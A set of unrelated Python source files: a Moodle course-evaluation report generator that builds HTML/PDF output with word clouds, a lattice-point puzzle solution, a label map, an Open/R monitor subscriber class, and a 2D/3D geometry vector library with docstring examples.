pool = tuple(iterable)
r = len(pool) if r is None else r
return tuple(random.sample(pool, r))
css = """
p.large-headline {
font-family: times, Times New Roman, times-roman, georgia, serif;
color: #444;
margin: 0px 0px 100px 0px;
padding: 40px 40px 40px 40px;
font-size: 55px;
line-height: 44px;
letter-spacing: -1px;
font-weight: bold;
text-align: center;
border-radius: 25px;
border: 2px solid #111;
width: 90%;
}
p.medium-headline {
font-family: times, Times New Roman, times-roman, georgia, serif;
color: #444;
margin: 0px -10px 0px 0px;
padding: 0px 0px 0px 0px;
font-size: 25px;
line-height: 24px;
letter-spacing: -1px;
font-weight: bold;
text-align: left;
}
p.name {
font-family: times, Times New Roman, times-roman, georgia, serif;
font-weight: bold;
font-size: 20px;
margin-top: 2em;
margin-bottom: 0em;
}
p.question {
font-family: times, Times New Roman, times-roman, georgia, serif;
font-size: 16px;
color: #111;
font-weight: bold;
margin-top: 0em;
margin-bottom: 0em;
width: 90%;
}
p.answer {
font-family: times, Times New Roman, times-roman, georgia, serif;
font-size: 14px;
color: #111;
text-align: justify;
margin-top: 0em;
margin-bottom: 0em;
width: 90%;
}
table
{
border-collapse: collapse;
}
th
{
color: #ffffff;
background-color: #000000;
}
td
{
background-color: #cccccc;
}
table, th, td
{
font-family:Arial, Helvetica, sans-serif;
border: 1px solid black;
text-align: right;
}
"""
def generatepdf(xl_filename,removeintermediate=False,verbose=False,include_word_count=False,order='forward',stopwords=wordcloud.STOPWORDS,css=css,collate='bystudent'):
pdf_filename = os.path.splitext(xl_filename)[0] + '_'+collate+'.pdf'
html_filename = os.path.splitext(xl_filename)[0] + '_'+collate+'.html'
wc_filename = os.path.splitext(xl_filename)[0] + '_'+collate+'-wordcloud.png'
print("I will write out the following files: {p} {h} {w}".format(p=pdf_filename,
h=html_filename,
w=wc_filename))
if removeintermediate:
print("But I will delete {h} and {w}.".format(h=html_filename,
w=wc_filename))
answers = pd.io.excel.read_excel(xl_filename,sheetname='RawData')
questionmap = pd.io.excel.read_excel(xl_filename,sheetname='QuestionMapper')
# Normalize the data ever so slightly: some versions had "Question 1"
# and others had "Question_1" and some were internally
# inconsistent. Mait it all underscores.
answers.columns = [i.replace(' ','_') for i in answers.columns]
questionmap['Column'] = [i.replace(' ','_') for i in questionmap['Column']]
# We want a per-student list of questions and answers. My first
# thought is to stick everything into a dictionary. We want to
# make sure to return the results in the correct order, so we
# could use an ordered dict. I think it's easier just to keep an
# ordered list of questions.
questions = questionmap["Question"].values
# About the below code:
#
# When we iterate through the rows, `idx` is the number of the
# row, and `qd` comes to us as the "question dictionary" where row
# 1 is expected to name the columns, and we can then look up
# entries by name. For example, column A happens to be "Column"
# and column B is "Question", so asking for `qd['Question']` gets
# the thing in column B.
#
# `qm` is then my "question map": it maps something like "Question
# 1" to "What were the most positive features of this course"
qm = {}
for (idx,qd) in questionmap.iterrows():
qn = qd['Column']
qt = qd['Question']
qm[qn] = qt
if verbose:
print(qm)
# Now let's grab the data that should be common to all rows
path = answers.Path[0]
course_code = answers.CourseCode[0]
course_title = answers.CourseTitle[0]
instructor_name = answers.InstructorName[0]
enrollments = answers.Enrollments[0]
# We know we're not extracting the following from each row, so keep quiet about it later.
knownskips = ['Path','CourseCode','CourseTitle','UniqueID','InstructorName','Enrollments']
# And now let's slurp up the data per student.
a = {}
for (idx,student) in answers.iterrows():
a[idx] = {}
for colname in answers.columns:
col_name = colname
if col_name in qm:
#print("Looking up",col_name)
a[idx][qm[col_name]] = student[colname]
else:
if colname not in knownskips:
print("Could not find",colname)
# Now we're ready to stamp out the text, believe it or not. The
# only cute thing is that `pandas` uses nan ("not a number") to
# represent missing data. We'll use `numpy` (imported above as
# `np`) to test for nan, and turn it into "No answer given."
if verbose:
print(a[0][questions[0]])
html = '''
<html>
<head>
<style>
{css}
</style>
</head>
<body>
<div>
<p class="large-headline">{title}</p>
<p class="medium-headline">{code}<br>{instructor}<br>Answers from {a} of {b} enrolled students</p>
'''.format(css=css,
title=course_title,code=course_code,instructor=instructor_name,
a=len(a),b=enrollments
)
html += '''<div class="content-analysis"><img src="{wc}" style="width:720px;height:560px;"/>'''.format(wc=os.path.split(wc_filename)[-1])
if include_word_count:
html += '''<table>
<caption>Most common words</caption>
<tr><th>Word</th><th>Count</th></tr>
'''
for (w,n) in c.most_common(20):
html += '<tr><td>{w}</td><td>{n}</td></tr>\n'.format(w=w,n=n)
html += '''</table>'''
html += '''</div>\n'''
answertext = ''
if collate=='byquestion':
for (idx,qd) in questionmap.iterrows():
qn = qd['Column']
if idx == 8:
# This is the 'what is your name' question
continue
qt = reformat_question(qd['Question'],instructor_name)
these_answers = answers[qn]
html += '''<div class="response">
<p class="name">Question: {q}</p>
'''.format(q=qt)
for (ii,answer) in enumerate(these_answers):
answer = reformat_answer(answer)
html += '''<p class="answer"><b>Student {i} ({n}): </b>{a}</p>
'''.format(a=answer,i=ii+1,
n=reformat_answer(answers['Question_9'][ii]))
answertext = answertext + ' ' + answer
html += '</div>\n'
elif collate=='bystudent':
orderedanswers = sorted(a)
if order == 'reverse':
orderedanswers = reversed(orderedanswers)
elif order == 'random':
orderedanswers = random_permutation(orderedanswers)
for idx in orderedanswers:
html += '''<div class="response">
<p class="name">Student {i} ({n})</p>
'''.format(
i=idx+1, n=reformat_answer(a[idx][questions[8]])
)
# NOTE: the above line assumes that the name is question 9, index 8.
# NOTE: the below line loops over all of the questions,
# including the name. That's repeated information, which we
# could likely remove. We used to go through question[:-1],
# but the name comes in before custom questions that the
# instructor can choose to add. So, if we want to remove the
# name question, we'll need to be smart about matching it
# above and below here. For now, this is easiest.
for question in questions:
question_cor_name = reformat_question(question,instructor_name)
answer = reformat_answer(a[idx][question])
answertext = answertext + ' ' + answer
html += '''<p class="question">{q}</p>
<p class="answer">{a}</p>
'''.format(q=question_cor_name,a=answer)
html += '</div>\n'
# Now loop
wordcloud = WordCloud(
font_path='Fonts/Raleway-Bold.ttf',
stopwords=stopwords,
background_color='white',
width=1800,
height=1400
).generate(answertext)
plt.imshow(wordcloud)
plt.axis('off')
plt.savefig(wc_filename, dpi=300)
c = Counter([i for i in answertext.lower().split() if i not in stopwords])
html += '''
</body>
</html>
'''
f = open(html_filename,'w')
f.write(html)
f.close()
weasyHTML(html_filename).write_pdf(pdf_filename)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('xlfilename',help='Name of the excel file to use')
parser.add_argument('-V','--verbose',help='Be extra verbose',action='store_true',default=False)
parser.add_argument('-W','--include-word-count',help='Include a table with the word count',action='store_true',default=False)
parser.add_argument('-s','--stop-words',nargs='+',type=str,help='Extra stop words, i.e. words NOT to include in the wordcloud and word count. E.g. -s class course lab')
parser.add_argument('-o','--order',default='forward',choices=['forward','reverse','random'],help='Order in which to return the student answers')
parser.add_argument('-c','--collate',default='bystudent',choices=['bystudent','byquestion'],help="Organize the answers by student (old style) or by question (new style)")
args = parser.parse_args()
if not args.xlfilename.endswith('xlsx'):
sys.exit('You must specify a .xlsx file, likely downloaded from Moodle')
stopwords = wordcloud.STOPWORDS
if args.stop_words is not None:
stopwords = stopwords.union(args.stop_words)
if args.order != 'forward':
sys.exit('Random and reverse order have not been fully tested. I think they may break with the student names, and with the by-question ordering.')
generatepdf(xl_filename=args.xlfilename, verbose=args.verbose, include_word_count=args.include_word_count,order=args.order, stopwords=stopwords,css=css, collate=args.collate)
|
def solution(r):
answer = 0
for i in range(1, r):
for j in range(1, r):
if i ** 2 + j ** 2 <= r ** 2:
answer += 1
return answer * 4
def main():
r = int(input())
print(solution(r))
if __name__ == '__main__':
main()
|
label_to_num = {
'normal': 0,
'tuberculosis': 1,
}
num_to_label = {v:k for k,v in label_to_num.items()}
|
#!/usr/bin/env python3
#
# Copyright (c) 2014-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
from __future__ import division
from builtins import object
from fbzmq.Monitor import ttypes as monitor_types
from openr.utils import socket, consts
import zmq
class MonitorSubscriber(object):
def __init__(self, zmq_ctx, monitor_pub_url, timeout=-1,
proto_factory=consts.Consts.PROTO_FACTORY):
# timeout set as -1 for indefinite blocking
self._monitor_sub_socket = socket.Socket(zmq_ctx, zmq.SUB, timeout,
proto_factory)
self._monitor_sub_socket.connect(monitor_pub_url)
self._monitor_sub_socket.set_sock_opt(zmq.SUBSCRIBE, b"")
def listen(self):
return self._monitor_sub_socket.recv_thrift_obj(
monitor_types.MonitorPub)
|
# -*- coding: utf-8 -*-
import collections.abc
import itertools
import math
ABS_TOL = 1e-7 # default value for math.isclose
class Vector(collections.abc.Sequence):
"""A vector, as described by xy or xyz coordinates.
In crossproduct a Vector object is a immutable sequence.
Iterating over a Vector will provide its coordinates.
Indexing a vector will return the coordinate for that index (0=x, 1=y, 2=z)
:param coordinates: Argument list of two (xy) or three (xyz) coordinates.
Coordinates should be of type int, float or similar numeric. These values
are converted to floats.
:raises ValueError: If less then 2 or more than 3 arguments are supplied.
.. rubric:: Code Example
.. code-block:: python
>>> v = Vector(1,2)
>>> print(v)
Vector(1.0,2.0)
.. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Basic-Definitions>`_
"""
def __add__(self,vector):
"""Addition of this vector and a supplied vector.
:param vector: A vector.
:type vector: Vector
:rtype: Vector
.. rubric:: Code Example
.. code-block:: python
>>> v = Vector(1,2)
>>> result = v + Vector(1,1)
>>> print(result)
Vector(2.0,3.0)
.. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Vector-Addition>`_
"""
zipped=itertools.zip_longest(self,vector) # missing values filled with None
try:
coordinates=[a+b for a,b in zipped]
except TypeError: # occurs if, say, a or b is None
raise ValueError('Vectors to add must be of the same length.')
return Vector(*coordinates)
def __eq__(self,vector):
"""Tests if this vector and the supplied vector have the same coordinates.
A tolerance value is used so coordinates with very small difference
are considered equal.
:param point: The point to be tested.
:type point: Point
:raises ValueError: If points are not of the same length.
:return: True if the point coordinates are the same, otherwise False.
:rtype: bool
.. rubric:: Code Example
.. code-block:: python
>>> result = Point(1,2) == Point(2,2)
>>> print(result)
False
"""
zipped=itertools.zip_longest(self,vector) # missing values filled with None
try:
result=[math.isclose(a, b, abs_tol=ABS_TOL) for a,b in zipped]
except TypeError: # occurs if, say, a or b is None
raise ValueError('Points to compare must be of the same length.')
return all(result)
def __getitem__(self,index):
""
return self._coordinates[index]
def __init__(self,*coordinates):
""
if len(coordinates)==2 or len(coordinates)==3:
self._coordinates=tuple(float(c) for c in coordinates)
else:
raise ValueError('Vector coordinates must have a length of 2 or 3')
def __len__(self):
""
return len(self._coordinates)
def __mul__(self,scalar):
"""Multiplication of this vector and a supplied scalar value.
:param scalar: A numerical scalar value.
:type scalar: float
:rtype: Vector
.. rubric:: Code Example
.. code-block:: python
>>> v = Vector(1,2)
>>> result = v1 * 2
>>> print(result)
Vector(2.0,4.0)
.. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Scalar-Multiplication>`_
"""
return Vector(*(c*scalar for c in self))
def __repr__(self):
""
return 'Vector(%s)' % ','.join([str(c) for c in self.coordinates])
def __sub__(self,vector):
"""Subtraction of this vector and a supplied vector.
:param vector: A vector.
:type vector: Vector
:rtype: Vector
.. rubric:: Code Example
.. code-block:: python
>>> v = Vector(1,2)
>>> result = v - Vector(1,1)
>>> print(result)
Vector(0,1)
"""
zipped=itertools.zip_longest(self,vector) # missing values filled with None
try:
coordinates=[a-b for a,b in zipped]
except TypeError: # occurs if, say, a or b is None
raise ValueError(r'Vectors to subtract must be of the same length.')
return Vector(*coordinates)
def cross_product(self,vector):
"""Returns the 3D cross product of this vector and the supplied vector.
:param vector: A 3D vector.
:type vector: Vector
:return: The 3D cross product of the two vectors.
This returns a new vector which is perpendicular to
this vector (self) and the supplied vector.
The returned vector has direction according to the right hand rule.
If this vector (self) and the supplied vector are collinear,
then the returned vector is (0,0,0)
:rtype: Vector
.. rubric:: Code Example
.. code-block:: python
>>> v1 = Vector3D(1,0,0)
>>> v2 = Vector3D(0,1,0)
>>> result = v1.cross_product(v2)
>>> print(result)
Vector3D(0,0,1)
.. seealso:: `<https://geomalgorithms.com/vector_products.html#3D-Cross-Product>`_
"""
(v1,v2,v3),(w1,w2,w3)=list(self),list(vector)
return Vector(v2*w3-v3*w2,
v3*w1-v1*w3,
v1*w2-v2*w1)
def dot(self,vector):
"""Return the dot product of this vector and the supplied vector.
:param vector: A vector.
:type vector: Vector
:returns: The dot product of the two vectors:
returns 0 if self and vector are perpendicular;
returns >0 if the angle between self and vector is an acute angle (i.e. <90deg);
returns <0 if the angle between seld and vector is an obtuse angle (i.e. >90deg).
:rtype: float
.. rubric:: Code Example
.. code-block:: python
>>> v1 = Vector(1,0)
>>> v2 = Vector(0,1)
>>> result = v1.dot(v2)
>>> print(result)
0
>>> v1 = Vector(1,0,0)
>>> v2 = Vector(0,1,0)
>>> result = v1.dot(v2)
>>> print(result)
0
.. seealso:: `<https://geomalgorithms.com/vector_products.html#Dot-Product>`_
"""
zipped=itertools.zip_longest(self,vector) # missing values filled with None
try:
return sum(a*b for a,b in zipped)
except TypeError: # occurs if, say, a or b is None
raise ValueError(r'Vectors to subtract must be of the same length.')
@property
def index_largest_absolute_coordinate(self):
"""Returns the index of the largest absolute coordinate of the vector.
:return: 1 if the x-coordinate has the largest absolute value,
2 if the y-coordinate has the largest absolute value, or
(for 3D vectors) 3 if the z-coordinate has the largest
absolute value.
:rtype: int
.. rubric:: Code Example
.. code-block:: python
# 2D example
>>> v = Vector(1,2)
>>> result = v.index_largest_absolute_coordinate
>>> print(result)
1
# 3D example
>>> v = Vector(1,2,3)
>>> result = v.index_largest_absolute_coordinate
>>> print(result)
2
"""
absolute_coords=[abs(c) for c in self]
return absolute_coords.index(max(absolute_coords))
def is_codirectional(self,vector):
"""Tests if this vector and the supplied vector are codirectional.
:param vector: A vector.
:type vector: Vector
:return: True if the vectors point in the exact same direction;
otherwise False.
:rtype: bool
.. rubric:: Code Example
.. code-block:: python
# 2D example
>>> v1 = Vector(1,2)
>>> v2 = Vector(2,4)
>>> result = v1.is_codirectional(v2)
>>> print(result)
True
# 3D example
>>> v1 = Vector(1,1,1)
>>> v2 = Vector(1,0,0)
>>> result = v1.is_codirectional(v2)
>>> print(result)
False
"""
return self.is_collinear(vector) and self.dot(vector)>0
def is_collinear(self,vector):
"""Tests if this vector and the supplied vector are collinear.
:param vector: A vector.
:type vector: Vector
:raise ValueError: If the vector is not 2D or 3D.
:return: True if the vectors lie on the same line;
otherwise False.
:rtype: bool
.. rubric:: Code Example
.. code-block:: python
>>> v1 = Vector(1,0)
>>> v2 = Vector(2,0)
>>> result = v1.is_collinear(v2)
>>> print(result)
True
>>> v1 = Vector3D(1,0,0)
>>> v2 = Vector3D(2,0,0)
>>> result = v1.is_collinear(v2)
>>> print(result)
True
"""
if len(self)==2:
return math.isclose(self.perp_product(vector), 0, abs_tol=ABS_TOL)
#return abs(self.perp_product(vector)) < SMALL_NUM
if len(self)==3:
return math.isclose(self.cross_product(vector).length, 0, abs_tol=ABS_TOL)
#return self.cross_product(vector).length < SMALL_NUM
else:
raise ValueError('"is_collinear" method requires a 2D or 3D vector.')
def is_opposite(self,vector):
"""Test if this vector and the supplied vector are opposites.
:param vector: A vector.
:type vector: Vector
:return: True if the vectors point in exact opposite directions;
otherwise False.
:rtype: bool
.. rubric:: Code Example
.. code-block:: python
# 2D example
>>> v1 = Vector(1,2)
>>> v2 = Vector(-2,-4)
>>> result = v1.is_opposite(v2)
>>> print(result)
True
# 3D example
>>> v1 = Vector(1,2,3)
>>> v2 = Vector(-1,-2,-3)
>>> result = v1.is_opposite(v2)
>>> print(result)
True
"""
return self.is_collinear(vector) and self.dot(vector)<0
def is_perpendicular(self,vector):
"""Test if this vector and the supplied vector are perpendicular.
:param vector: A vector.
:type vector: Vector
:return: True if the vectors are perpendicular;
otherwise False.
:rtype: bool
.. rubric:: Code Example
.. code-block:: python
# 2D example
>>> v1 = Vector(1,0)
>>> v2 = Vector(0,1)
>>> result = v1.is_perpendicular(v2)
>>> print(result)
True
# 3D example
>>> v1 = Vector(1,0,0)
>>> v2 = Vector(0,1,0)
>>> result = v1.is_perpendicular(v2)
>>> print(result)
True
"""
return math.isclose(self.dot(vector), 0, abs_tol=ABS_TOL)
#return abs(self.dot(vector))<SMALL_NUM
@property
def length(self):
"""Returns the length of the vector.
:rtype: float
.. rubric:: Code Example
.. code-block:: python
>>> v = Vector(1,0)
>>> result = v.length
>>> print(result)
1
.. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Vector-Length>`_
"""
return sum(c**2 for c in self)**0.5
#(self.x**2+self.y**2)**0.5
@property
def normalise(self):
"""Returns the normalised vector of this vector.
:returns: A codirectional vector of length 1.
:rtype: Vector
:Example:
.. code-block:: python
>>> v = Vector(3,0)
>>> result = v.normalise
>>> print(result)
Vector(1,0)
.. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Vector-Length>`_
"""
l=self.length
return Vector(*(c/l for c in self))
@property
def opposite(self):
"""Returns the opposite vector of this vector
:return: A collinear vector which points in the opposite direction.
:rtype: Vector
.. rubric:: Code Example
.. code-block:: python
# 2D example
>>> v = Vector(1,2)
>>> result = v.opposite
>>> print(result)
Vector(-1,-2)
# 3D example
>>> v = Vector(1,2,3)
>>> result = v.opposite
>>> print(result)
Vector(-1,-2,-3)
"""
return self*-1
def perp_product(self,vector):
"""Returns the perp product of this vector and the supplied vector.
:param vector: A 2D vector.
:type vector: Vector
:raises ValueError: If this vector is not a 2D vector.
:return: The perp product of the two vectors.
The perp product is the dot product of
the perp_vector of this vector and the supplied vector.
If supplied vector is collinear with self, returns 0.
If supplied vector is on the left of self, returns >0 (i.e. counterclockwise).
If supplied vector is on the right of self, returns <0 (i.e. clockwise).
:rtype: float
.. code-block:: python
.. code-block:: python
>>> v1 = Vector(1,0)
>>> v2 = Vector(1,0)
>>> result = v1.perp_product(v2)
>>> print(result)
0
.. seealso:: `<https://geomalgorithms.com/vector_products.html#2D-Perp-Product>`_
"""
if len(self)==2:
return self.perp_vector.dot(vector)
else:
raise ValueError('"perp_product" method only applicable for a 2D vector.')
@property
def perp_vector(self):
"""Returns the perp vector of this 2D vector.
:raises ValueError: If this vector is not a 2D vector.
:return: The perp vector, i.e. the normal vector on the left
(counterclockwise) side of self.
:rtype: Vector
.. rubric:: Code Example
.. code-block:: python
>>> v = Vector(1,0)
>>> result = v.perp_vector
>>> print(result)
Vector(0,1)
.. seealso:: `<https://geomalgorithms.com/vector_products.html#2D-Perp-Operator>`_
"""
if len(self)==2:
return Vector(-self.y,self.x)
else:
raise ValueError('"perp_vector" method only applicable for a 2D vector.')
def triple_product(self,vector1,vector2):
"""Returns the triple product of this vector and 2 supplied vectors.
:param vector1: A 3D vector.
:type vector1: Vector
:param vector2: A 3D vector.
:type vector2: Vector
:return: The triple product of the three vectors.
The result is equal to the volume of the parallelepiped (3D equivalent of a parallelogram).
The result is equal to six times the volume of the tetrahedron (3D shape with 4 vertices).
:rtype: float
.. rubric:: Code Example
.. code-block:: python
>>> v1 = Vector(1,0,0)
>>> v2 = Vector(0,1,0)
>>> v3 = Vector(0,0,1)
>>> result = v1.triple_product(v2,v3)
>>> print(result)
1
.. seealso:: `<https://geomalgorithms.com/vector_products.html#3D-Triple-Product>`_
"""
return self.dot(vector1.cross_product(vector2))
@property
def x(self):
"""The x coordinate of the vector.
:rtype: int, float
"""
return self[0]
@property
def y(self):
"""The y coordinate of the vector.
:rtype: int, float
"""
return self[1]
@property
def z(self):
"""The z coordinate of the vector.
:raises IndexError: If vector is a 2D vector.
:rtype: int, float
"""
return self[2]
class Vector2D(Vector):
"""A two dimensional vector, situated on an x, y plane.
:param x: The x coordinate of the vector.
:type x: float
:param y: The y coordinate of the vector.
:type y: float
:Example:
.. code-block:: python
>>> v = Vector2D(1,2)
>>> print(v)
Vector2D(1,2)
.. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Basic-Definitions>`_
"""
def __init__(self,x,y):
""
self._x=x
self._y=y
def __add__(self,vector):
"""Addition of this vector and a supplied vector.
:param vector: A 2D vector.
:type vector: Vector2D
:rtype: Vector2D
:Example:
.. code-block:: python
>>> v = Vector2D(1,2)
>>> result = v + Vector2D(1,1)
>>> print(result)
Vector2D(2,3)
.. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Vector-Addition>`_
"""
return Vector2D(self.x+vector.x,
self.y+vector.y)
def __eq__(self,vector):
"""Tests if this vector and the supplied vector are equal.
:param vector: A 2D vector.
:type vector: Vector2D
:return: True if the vector coordinates are the same; otherwise false
:rtype: bool
:Example:
.. code-block:: python
>>> v1 = Vector2D(1,2)
>>> v2 = Vector2D(2,2)
>>> result = v1 == v2
>>> print(result)
False
"""
return (abs(self.x-vector.x)<SMALL_NUM and
abs(self.y-vector.y)<SMALL_NUM)
def __repr__(self):
""
return 'Vector2D(%s)' % ','.join([str(c) for c in self.coordinates])
def __mul__(self,scalar):
"""Multiplication of this vector and a supplied scalar value.
:param scalar: a numerical scalar value
:type scalar: float
:rtype: Vector2D
:Example:
.. code-block:: python
>>> v = Vector2D(1,2)
>>> result = v1 * 2
>>> print(result)
Vector2D(2,4)
.. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Scalar-Multiplication>`_
"""
return Vector2D(self.x*scalar,
self.y*scalar)
def __sub__(self,vector):
"""Subtraction of this vector and a supplied vector.
:param vector: A 2D vector.
:type vector: Vector2D
:rtype: Vector2D
:Example:
.. code-block:: python
>>> v = Vector2D(1,2)
>>> result = v - Vector2D(1,1)
>>> print(result)
Vector2D(0,1)
"""
return Vector2D(self.x-vector.x,
self.y-vector.y)
@property
def coordinates(self):
"""Returns the coordinates of the vector.
:return: The x and y coordinates as tuple (x,y)
:rtype: tuple
:Example:
.. code-block:: python
>>> v = Vector2D(1,2)
>>> result = v.coordinates
>>> print(result)
(1,2)
"""
return self.x, self.y
@property
def dimension(self):
"""The dimension of the vector.
:return: '2D'
:rtype: str
:Example:
.. code-block:: python
>>> v = Vector2D(2,1)
>>> print(v.dimension)
'2D'
"""
return '2D'
def dot(self,vector):
"""Return the dot product of this vector and the supplied vector.
:param vector: A 2D vector.
:type vector: Vector2D
:return: The dot product of the two vectors:
returns 0 if self and vector are perpendicular;
returns >0 if the angle between self and vector is an acute angle (i.e. <90deg);
returns <0 if the angle between seld and vector is an obtuse angle (i.e. >90deg).
:rtype: float
:Example:
.. code-block:: python
>>> v1 = Vector2D(1,0)
>>> v2 = Vector2D(0,1)
>>> result = v1.dot(v2)
>>> print(result)
0
.. seealso:: `<https://geomalgorithms.com/vector_products.html#Dot-Product>`_
"""
return self.x*vector.x+self.y*vector.y
def is_collinear(self,vector):
"""Tests if this vector and the supplied vector are collinear.
:param vector: A 2D vector.
:type vector: Vector2D
:return: True if the vectors lie on the same line;
otherwise False.
:rtype: bool
:Example:
.. code-block:: python
>>> v1 = Vector2D(1,0)
>>> v2 = Vector2D(2,0)
>>> result = v1.is_collinear(v2)
>>> print(result)
True
"""
return abs(self.perp_product(vector)) < SMALL_NUM
@property
def length(self):
"""Returns the length of the vector.
:rtype: float
:Example:
.. code-block:: python
>>> v = Vector2D(1,0)
>>> result = v.length
>>> print(result)
1
.. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Vector-Length>`_
"""
return (self.x**2+self.y**2)**0.5
@property
def normalise(self):
"""Returns the normalised vector of this vector.
:return: A codirectional vector of length 1.:
:rtype: Vector 2D
:Example:
.. code-block:: python
>>> v = Vector2D(3,0)
>>> result = v.normalise
>>> print(result)
Vector2D(1,0)
.. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Vector-Length>`_
"""
l=self.length
return Vector2D(self.x/l,
self.y/l)
def perp_product(self,vector):
"""Returns the perp product of this vector and the supplied vector.
:param vector: A 2D vector.
:type vector: Vector2D
:return: The perp product of the two vectors.
The perp product is the dot product of
the perp_vector of this vector and the supplied vector.
If supplied vector is collinear with self, returns 0.
If supplied vector is on the left of self, returns >0 (i.e. counterclockwise).
If supplied vector is on the right of self, returns <0 (i.e. clockwise).
:rtype: float
:Example:
.. code-block:: python
>>> v1 = Vector2D(1,0)
>>> v2 = Vector2D(1,0)
>>> result = v1.perp_product(v2)
>>> print(result)
0
.. seealso:: `<https://geomalgorithms.com/vector_products.html#2D-Perp-Product>`_
"""
return self.perp_vector.dot(vector)
@property
def perp_vector(self):
"""Returns the perp vector of this vector.
:return: The perp vector, i.e. the normal vector on the left
(counterclockwise) side of self.
:rtype: Vector2D
:Example:
.. code-block:: python
>>> v = Vector2D(1,0)
>>> result = v.perp_vector
>>> print(result)
Vector2D(0,1)
.. seealso:: `<https://geomalgorithms.com/vector_products.html#2D-Perp-Operator>`_
"""
return Vector2D(-self.y,self.x)
@property
def x(self):
"""The x coordinate of the vector.
:rtype: float
"""
return self._x
@property
def y(self):
"""The y coordinate of the vector.
:rtype: float
"""
return self._y
class Vector3D(Vector):
"""A three dimensional vector, situated on an x, y, z plane.
:param x: The x coordinate of the vector.
:type x: float
:param y: The y coordinate of the vector.
:type y: float
:param z: The y coordinate of the vector.
:type z: float
:Example:
.. code-block:: python
>>> v = Vector3D(1,2,3)
>>> print(v)
Vector3D(1,2,3)
.. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Basic-Definitions>`_
"""
def __init__(self,x=0,y=0,z=0):
""
self._x=x
self._y=y
self._z=z
def __add__(self,vector):
"""Addition of this vector and a supplied vector.
:param vector: A 3D vector.
:type vector: Vector3D
:rtype: Vector3D
:Example:
.. code-block:: python
>>> v = Vector3D(1,2,3)
>>> result = v + Vector3D(1,1,1)
>>> print(result)
Vector3D(2,3,4)
"""
return Vector3D(self.x+vector.x,
self.y+vector.y,
self.z+vector.z)
def __eq__(self,vector):
"""Tests if this vector and the supplied vector are equal.
:param vector: A 3D vector.
:type vector: Vector3D
:return: True if the vector coordinates are the same; otherwise false
:rtype: bool
:Example:
.. code-block:: python
>>> v1 = Vector3D(1,2,3)
>>> v2 = Vector3D(2,2,3)
>>> result = v1 == v2
>>> print(result)
False
"""
if isinstance(vector,Vector3D):
return (abs(self.x-vector.x)<SMALL_NUM
and abs(self.y-vector.y)<SMALL_NUM
and abs(self.z-vector.z)<SMALL_NUM)
else:
return False
def __repr__(self):
""
return 'Vector3D(%s)' % ','.join([str(c) for c in self.coordinates])
def __mul__(self,scalar):
"""Multiplication of this vector and a supplied scalar value.
:param scalar: a numerical scalar value
:type scalar: float
:rtype: Vector3D
:Example:
.. code-block:: python
>>> v = Vector3D(1,2,3)
>>> result = v1 * 2
>>> print(result)
Vector2D(2,4,6)
.. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Scalar-Multiplication>`_
"""
if isinstance(scalar,int) or isinstance(scalar,float):
return Vector3D(self.x*scalar,
self.y*scalar,
self.z*scalar)
else:
raise TypeError
def __sub__(self,vector):
"""Subtraction of this vector and a supplied vector.
:param vector: A 3D vector.
:type vector: Vector3D
:rtype: Vector3D
:Example:
.. code-block:: python
>>> v = Vector3D(1,2,3)
>>> result = v - Vector3D(1,1,1)
>>> print(result)
Vector3D(0,1,2)
"""
return Vector3D(self.x-vector.x,
self.y-vector.y,
self.z-vector.z)
def cross_product(self,vector):
"""Returns the 3D cross product of this vector and the supplied vector.
:param vector: A 3D vector.
:type vector: Vector3D
:return: The 3D cross product of the two vectors.
This returns a new vector which is perpendicular to
this vector (self) and the supplied vector.
The returned vector has direction according to the right hand rule.
If this vector (self) and the supplied vector are collinear,
then the returned vector is (0,0,0)
:rtype: Vector3D
:Example:
.. code-block:: python
>>> v1 = Vector3D(1,0,0)
>>> v2 = Vector3D(0,1,0)
>>> result = v1.cross_product(v2)
>>> print(result)
Vector3D(0,0,1)
.. seealso:: `<https://geomalgorithms.com/vector_products.html#3D-Cross-Product>`_
"""
(v1,v2,v3),(w1,w2,w3)=self.coordinates,vector.coordinates
return Vector3D(v2*w3-v3*w2,
v3*w1-v1*w3,
v1*w2-v2*w1)
@property
def coordinates(self):
"""Returns the coordinates of the vector.
:return: The x and y coordinates as tuple (x,y,z)
:rtype: tuple
:Example:
.. code-block:: python
>>> v = Vector3D(1,2,3)
>>> result = v.coordinates
>>> print(result)
(1,2,3)
"""
return self.x, self.y, self.z
@property
def dimension(self):
"""The dimension of the vector.
:return: '3D'
:rtype: str
:Example:
.. code-block:: python
>>> v = Vector3D(1,2,3)
>>> print(v.dimension)
'3D'
"""
return '3D'
def dot(self,vector):
"""Return the dot product of this vector and the supplied vector.
:param vector: A 3D vector.
:type vector: Vector3D
:return: The dot product of the two vectors:
returns 0 if self and vector are perpendicular;
returns >0 if the angle between self and vector is an acute angle (i.e. <90deg);
returns <0 if the angle between seld and vector is an obtuse angle (i.e. >90deg).
:rtype: float
:Example:
.. code-block:: python
>>> v1 = Vector3D(1,0,0)
>>> v2 = Vector3D(0,1,0)
>>> result = v1.dot(v2)
>>> print(result)
0
.. seealso:: `<https://geomalgorithms.com/vector_products.html#Dot-Product>`_
"""
return self.x*vector.x + self.y*vector.y + self.z*vector.z
def is_collinear(self,vector):
"""Tests if this vector and the supplied vector are collinear.
:param vector: A 3D vector.
:type vector: Vector3D
:return: True if the vectors lie on the same line;
otherwise False.
:rtype: bool
:Example:
.. code-block:: python
>>> v1 = Vector3D(1,0,0)
>>> v2 = Vector3D(2,0,0)
>>> result = v1.is_collinear(v2)
>>> print(result)
True
"""
return self.cross_product(vector).length < SMALL_NUM
@property
def length(self):
"""Returns the length of the vector.
:rtype: float
:Example:
.. code-block:: python
>>> v = Vector3D(1,0,0)
>>> result = v.length
>>> print(result)
1
.. seealso:: `<https://geomalgorithms.com/points_and_vectors.html#Vector-Length>`_
